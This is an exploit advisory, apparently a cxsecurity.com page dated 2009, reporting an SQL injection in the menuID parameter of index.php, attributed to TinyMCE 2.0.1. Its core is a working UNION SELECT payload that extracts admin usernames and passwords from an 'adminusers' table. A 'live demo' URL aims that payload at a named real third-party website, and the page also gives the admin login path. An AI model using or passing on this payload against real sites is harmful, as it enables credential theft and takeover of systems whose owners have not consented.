TinyMCE 2.0.1 (index.php menuID) Remote SQL Injection Vulnerability

2009.02.06
Credit: AnGeL25dZ
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

************************************************************ ** TinyMCE Remote SQL Injection ************************************************************ ** Prodcut: TinyMCE Version 2.0.1 ** Home : http://tinymce.moxiecode.com ** Vunlerability : 2/ SQL Injection ** Risk : high !! ** Dork : N/A ************************************************************ ** Discovred by: AnGeL25dZ ** From : Constantine - Algeria ** Contact : angel25dz@gmail.com ** ********************************************************* ** Greetz to : ALLAH ** All Members of HackTeachTeam http://www.hackteach.org/ ** Ra3ch, His0k4 ************************************************************ ** Remote SQL Injection vulnerability ** ** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers ** ** Use : http://[path]/Exploit ** Admin : http://[path]/cms/login.php **************************************************************** ** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers ** ****************************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top